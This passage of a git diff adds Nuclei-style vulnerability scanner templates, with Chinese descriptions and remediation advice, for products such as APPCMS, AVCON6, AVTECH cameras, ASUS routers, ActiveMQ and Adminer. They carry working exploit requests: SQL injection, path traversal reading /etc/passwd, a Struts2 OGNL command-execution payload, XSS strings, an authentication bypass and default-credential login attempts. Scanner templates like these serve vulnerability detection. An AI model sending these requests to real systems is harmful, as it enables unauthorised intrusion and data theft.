在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.zhiyouyun.com + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: or + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849b') + raw: + - | + GET /index.php?q=xxoo%27%20union%20select%20md5(1),2,3%20from%20appcms_admin_list%20where%20uid%20like%20%27 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/APPCMS/wooyun-2015-0139684.yaml b/config/51pwn/yaml/APPCMS/wooyun-2015-0139684.yaml new file mode 100755 index 000000000..b3f75c6f7 --- /dev/null +++ b/config/51pwn/yaml/APPCMS/wooyun-2015-0139684.yaml @@ -0,0 +1,36 @@ +id: wooyun-2015-0139684 +info: + name: appcms敏感信息泄露 + author: + - jim2g + description: | + appcms敏感信息泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.zhiyouyun.com + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'host') + - contains(body,'dbpass') + raw: + - | + GET /index.php?tpl=../../install/templates/step4.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/ASUS GT-AC2900/CVE-2021-32030.yaml b/config/51pwn/yaml/ASUS GT-AC2900/CVE-2021-32030.yaml new file mode 100755 index 000000000..588f5c6c9 --- /dev/null +++ b/config/51pwn/yaml/ASUS GT-AC2900/CVE-2021-32030.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-32030 +info: + name: ASUS GT-AC2900 - Authentication Bypass + author: + - gy741 + description: |- + ASUS GT-AC2900 逻辑漏洞 + ASUS GT-AC2900是中国华硕(ASUS)公司的一个路由器。 + + ASUS GT-AC2900 devices 3.0.0.4.386.42643之前版本存在安全漏洞,该漏洞允许管理员应用程序在处理未经认证用户的远程输入时,允许绕过认证,导致未经认证的用户访问管理员界面。 + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/json + - type: word + condition: and + words: + - get_cfg_clientlist + - alias + - model_name + matchers-condition: and + raw: + - | + GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 + Host: {{Hostname}} + User-Agent: asusrouter-- + Referer: {{BaseURL}} + Cookie: asus_token=\0Invalid; clickedItem_tab=0 diff --git a/config/51pwn/yaml/AVCON6/avcon6-download-lfd.yaml b/config/51pwn/yaml/AVCON6/avcon6-download-lfd.yaml new file mode 100755 index 000000000..39a0737cc --- /dev/null +++ b/config/51pwn/yaml/AVCON6/avcon6-download-lfd.yaml @@ -0,0 +1,31 @@ +id: avcon6-download-lfd +info: + name: avcon6__arbitrarily_download + author: + - jim2g + description: |- + avcon6-download-lfd存在任意文件下载漏洞 + 华平信息技术股份有限公司是一家视讯产品与应用提供商,掌握视频处理、视音频编解码和网络适应性等。AVCON6 系统管理平台 download.action 存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器任意文件 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.avcon.com.cn/ + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"root:x:") + raw: + - | + GET /download.action?filename=../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/AVCON6/avcon6-infomation-leak.yaml b/config/51pwn/yaml/AVCON6/avcon6-infomation-leak.yaml new file mode 100755 index 000000000..b43a27011 --- /dev/null +++ b/config/51pwn/yaml/AVCON6/avcon6-infomation-leak.yaml @@ -0,0 +1,39 @@ +id: avcon6-infomation-leak +info: + name: avcon6__infomation_leak + author: + - jim2g + description: | + avcon6-infomation-leak任意文件上传漏洞 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.avcon.com.cn/ + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"System Fingerprint") + raw: + - | + GET /AvconWebService/fingerprint.jsp HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/AVCON6/avcon6-infomation-rce.yaml b/config/51pwn/yaml/AVCON6/avcon6-infomation-rce.yaml new file mode 100755 index 000000000..d457b957f --- /dev/null +++ b/config/51pwn/yaml/AVCON6/avcon6-infomation-rce.yaml @@ -0,0 +1,30 @@ +id: avcon6-infomation-rce +info: + name: AVCON6在线教育系统_远程命令执行 + author: + - jim2g + description: |- + AVCON6在线教育系统_远程命令执行漏洞 + 华平信息技术股份有限公司是一家多媒体通信系统和智慧城市解决方案提供。 + + 华平信息技术股份有限公司AVCON6系统管理平台存在S2-046和S2-045远程代码执行漏洞。允许攻击者远程执行命令,获得服务器权限。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.avcon.com.cn/ + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"5KIR2N0VM1auBAbCgwzpkcjJnFZWX89r") + raw: + - | + GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22echo%22,%225KIR2N0VM1auBAbCgwzpkcjJnFZWX89r%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/AVTECH/AVTECH-Machine-info.yaml b/config/51pwn/yaml/AVTECH/AVTECH-Machine-info.yaml new file mode 100755 index 000000000..436135b4f --- /dev/null +++ b/config/51pwn/yaml/AVTECH/AVTECH-Machine-info.yaml @@ -0,0 +1,35 @@ +id: AVTECH-Machine-info +info: + name: AVTECH 视频监控设备_nobody_Machine.cgi所有配置信息 + author: + - jim2g + description: | + AVTECH 视频监控设备_nobody_Machine.cgi存在信息泄露漏洞 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"MACAddress") + raw: + - | + GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/AVTECH/AVTECH-cgibox-lfd.yaml b/config/51pwn/yaml/AVTECH/AVTECH-cgibox-lfd.yaml new file mode 100755 index 000000000..11e7cfdf4 --- /dev/null +++ b/config/51pwn/yaml/AVTECH/AVTECH-cgibox-lfd.yaml @@ -0,0 +1,31 @@ +id: AVTECH-cgibox-lfd +info: + name: AVTECH 视频监控设备cgi-bin_cgibox_.cab 任意文件下载 + author: + - jim2g + description: | + AVTECH 视频监控设备cgi-bin_cgibox_.cab 存在任意文件下载漏洞 + 任意文件读取/下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说,攻击者利用服务器API、文件标准权限进行攻击。任意文件读取/下载漏洞可能存在于Web服务器软件本身,也可能存在于Web应用程序之中。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"get_mtd_partition_size") + raw: + - | + GET /cgi-bin/cgibox?.cab HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/AVTECH/ssvid-92494.yaml b/config/51pwn/yaml/AVTECH/ssvid-92494.yaml new file mode 100755 index 000000000..40bd08d35 --- /dev/null +++ b/config/51pwn/yaml/AVTECH/ssvid-92494.yaml @@ -0,0 +1,35 @@ +id: ssvid-92494 +info: + name: AVTECH 视频监控设备cgi-bin_cgibox_.cab 视频监控设备Search.cgi获取局域网中所有的摄像头的配置信息 + author: + - jim2g + description: | + AVTECH 视频监控设备Search.cgi获取局域网中所有的摄像头的配置信息 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"Gateway") + raw: + - | + GET /cgi-bin/nobody/Search.cgi?action=scan HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Accela Civic Platform/CVE-2021-33904.yaml b/config/51pwn/yaml/Accela Civic Platform/CVE-2021-33904.yaml new file mode 100755 index 000000000..1d595e668 --- /dev/null +++ b/config/51pwn/yaml/Accela Civic Platform/CVE-2021-33904.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-33904 +info: + name: Accela Civic Platform 21.1 - 'servProvCode' XSS + author: + - geeknik + description: |- + Accela Civic Platform 跨站脚本漏洞 + Accela Civic Platform是Accela公司的应用软件基于云的解决方案使城市系统现代化,以实现土地管理和法规执行、增加公民参与和移动信息访问 + + Accela 存在跨站脚本漏洞,该漏洞源于Accela平台缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21 + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: header + words: + - text/html + - type: word + condition: and + words: + - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"' + - servProvCode + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9' + method: GET diff --git a/config/51pwn/yaml/Accela Civic Platform/CVE-2021-34370.yaml b/config/51pwn/yaml/Accela Civic Platform/CVE-2021-34370.yaml new file mode 100755 index 000000000..4476c25cc --- /dev/null +++ b/config/51pwn/yaml/Accela Civic Platform/CVE-2021-34370.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-34370 +info: + name: Accela Civic Platform 21.1 - Open Redirect & XSS + author: + - 0x_akoko + description: |- + Accela Civic Platform 跨站脚本漏洞 + Accela Civic Platform是Accela公司的应用软件基于云的解决方案使城市系统现代化,以实现土地管理和法规执行、增加公民参与和移动信息访问 + + Accela Civic Platform 20.1之前版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.accela.com/civic-platform/ + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$ + path: + - '{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/' + method: GET diff --git a/config/51pwn/yaml/Acrolinx Server/CVE-2018-7719.yaml b/config/51pwn/yaml/Acrolinx Server/CVE-2018-7719.yaml new file mode 100755 index 000000000..99a960cd4 --- /dev/null +++ b/config/51pwn/yaml/Acrolinx Server/CVE-2018-7719.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-7719 +info: + name: Acrolinx Server Directory Traversal + author: + - l0ne1y + description: |- + Acrolinx Server for Windows 任意文件读取漏洞 + Acrolinx Server for Windows是德国Acrolinx公司的一款基于Windows平台的智能语言分析服务器。 + + 基于Windows平台的Acrolinx Server 5.2.5之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确验证用户输入。攻击者可借助特制URL利用该漏洞查看系统上任意文件。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://support.acrolinx.com/hc/en-us/articles/213987685-Acrolinx-Server-Version-5-1-including-subsequent-service-releases- + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - bit app support + - fonts + - extensions + raw: + - |+ + GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + Host: {{Hostname}} + + unsafe: true diff --git a/config/51pwn/yaml/ActiveMQ/CVE-2018-8006.yaml b/config/51pwn/yaml/ActiveMQ/CVE-2018-8006.yaml new file mode 100755 index 000000000..9077eab1d --- /dev/null +++ b/config/51pwn/yaml/ActiveMQ/CVE-2018-8006.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-8006 +info: + name: Apache ActiveMQ XSS + author: + - l0ne1y + description: |- + Apache ActiveMQ 跨站脚本漏洞 + Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 + + Apache ActiveMQ 5.0.0版本至5.15.5版本中的queue.jsp页面的Web管理控制台存在跨站脚本漏洞,该漏洞源于程序没有充分的过滤用户提交的输入。远程攻击者可利用该漏洞在用户浏览器中执行任意脚本代码。 + severity: medium + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt + + **临时修复方案** + 对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + words: + - '">' + - type: word + part: header + words: + - /html + matchers-condition: and + path: + - '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68' + method: GET diff --git a/config/51pwn/yaml/ActiveMQ/activemq-default-login.yaml b/config/51pwn/yaml/ActiveMQ/activemq-default-login.yaml new file mode 100755 index 000000000..fc3abe16e --- /dev/null +++ b/config/51pwn/yaml/ActiveMQ/activemq-default-login.yaml @@ -0,0 +1,38 @@ +id: activemq-default-login +info: + name: Apache ActiveMQ Default Login + author: + - pdteam + description: |- + ActiveMQ默认账户密码 + 默认的ActiveMQ账号密码 + admin/admin、user/user + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + #### 临时修复方案 + 1. 在账户注册或创建账户时,对用户的密码强度进行强制要求,数字、字母、特殊字符组合,8位以上。 + 2. 用户使用初始密码登录时,强制修改密码。 + 3. 在应用中可以设置定期修改密码的策略。 + 4. 立即修改弱口令账号至强口令。 +requests: +- matchers: + - type: word + condition: and + words: + - Welcome to the Apache ActiveMQ Console of + -

Broker

+ raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork + payloads: + password: + - user + - admin + username: + - user + - admin diff --git a/config/51pwn/yaml/ActiveMQ/poc-yaml-CVE-2016-3088.yaml b/config/51pwn/yaml/ActiveMQ/poc-yaml-CVE-2016-3088.yaml new file mode 100755 index 000000000..c49a26f3b --- /dev/null +++ b/config/51pwn/yaml/ActiveMQ/poc-yaml-CVE-2016-3088.yaml @@ -0,0 +1,40 @@ +id: poc-yaml-CVE-2016-3088 +info: + name: ActiveMQ任意文件操作漏洞 + author: + - 折跃 + description: |- + ActiveMQ任意文件操作漏洞 + 本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + + #### 临时修复方案: + 1. 升级系统至无漏洞版本 + 2. 将上传目录设置无写入权限 + 3. 手动修改代码去除漏洞代码或添加鉴权 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1 == 204 + - status_code_2 == 200 + - contains(body_2,'{{fileDate}}') + raw: + - | + PUT /fileserver/{{fileName}}.txt HTTP/1.1 + Host: {{Hostname}} + + {{fileDate}} + - | + GET /fileserver/{{fileName}}.txt HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + req-condition: true +variables: + fileDate: '{{rand_text_alphanumeric(32,"")}}' + fileName: '{{rand_text_alphanumeric(6,"")}}' diff --git a/config/51pwn/yaml/Adminer/CVE-2021-21311.yaml b/config/51pwn/yaml/Adminer/CVE-2021-21311.yaml new file mode 100755 index 000000000..796ae93a0 --- /dev/null +++ b/config/51pwn/yaml/Adminer/CVE-2021-21311.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-21311 +info: + name: Adminer SSRF Using Verbose Error Messages + author: + - adam crosser + description: |- + SOURCEFORGE Adminer SSRF漏洞 + SOURCEFORGE Adminer是美国SOURCEFORGE社区的一个应用软件。提供单个PHP文件中的数据库管理。 + + SOURCEFORGE Adminer 中存在代码问题漏洞,该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + /~https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 + + 临时修复方案:
1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。
2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。
3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。
4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。
5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: status + status: + - 403 + - type: word + part: body + words: + - '<title>400 - Bad Request</title>' + matchers-condition: and + path: + - '{{BaseURL}}/adminer?elastic=example.com&username=' + method: GET diff --git a/config/51pwn/yaml/Adminer/CVE-2021-29625.yaml b/config/51pwn/yaml/Adminer/CVE-2021-29625.yaml new file mode 100755 index 000000000..d2690f654 --- /dev/null +++ b/config/51pwn/yaml/Adminer/CVE-2021-29625.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-29625 +info: + name: Adminer reflected XSS via the table parameter + author: + - daffainfo + description: |- + SOURCEFORGE Adminer 跨站脚本漏洞 + SOURCEFORGE Adminer是美国SOURCEFORGE社区的一个应用软件。提供单个PHP文件中的数据库管理。 + + Adminer 4.6.1版本至4.8.0版本存在安全漏洞,该漏洞源于Adminer使用pdo扩展与数据库通信。在没有CSP的浏览器中会受到影响。 + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + /~https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7 + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git "a/config/51pwn/yaml/Adobe Experience Manager\357\274\210AEM\357\274\211/CVE-2016-0957.yaml" "b/config/51pwn/yaml/Adobe Experience Manager\357\274\210AEM\357\274\211/CVE-2016-0957.yaml" new file mode 100755 index 000000000..70885387b --- /dev/null +++ "b/config/51pwn/yaml/Adobe Experience Manager\357\274\210AEM\357\274\211/CVE-2016-0957.yaml" @@ -0,0 +1,33 @@ +id: CVE-2016-0957 +info: + name: Adobe AEM Console Disclosure + author: + - l0ne1y + description: |- + Adobe Experience Manager认证绕过漏洞 + + Adobe Experience Manager(AEM)是美国奥多比(Adobe)公司的一套可用于构建网站、移动应用程序和表单的内容管理解决方案。该方案支持移动内容管理、营销销售活动管理和多站点管理等。Dispatcher是其中的一个保持AEM缓存或者负载平衡的工具。 + + AEM的Dispatcher中存在安全漏洞,该漏洞源于程序没有正确实现URL过滤器。远程攻击者可利用该漏洞绕过dispatcher规则。以下版本受到影响:AEM 5.6.1版本,6.0.0版本,6.1.0版本,Dispatcher 4.1.5之前版本。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - Adobe + - java.lang + - (Runtime) + matchers-condition: and + path: + - '{{BaseURL}}/system/console?.css' + method: GET + headers: + Authorization: Basic YWRtaW46YWRtaW4K diff --git a/config/51pwn/yaml/Advanced Comment System/CVE-2020-35598.yaml b/config/51pwn/yaml/Advanced Comment System/CVE-2020-35598.yaml new file mode 100755 index 000000000..c42678ce7 --- /dev/null +++ b/config/51pwn/yaml/Advanced Comment System/CVE-2020-35598.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-35598 +info: + name: Advanced Comment System 1.0 - Path Traversal + author: + - daffainfo + description: |- + Advanced Comment System 任意文件读取漏洞 + Advanced Comment System是一套高级评论系统。 + + ACS Advanced Comment System 1.0 存在路径遍历漏洞,该漏洞源于一个高级组件系统index.php。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://seclists.org/fulldisclosure/2020/Dec/13 + + 临时修复方案:
1、过滤\".\",使用户在url中不能回溯上级目录。
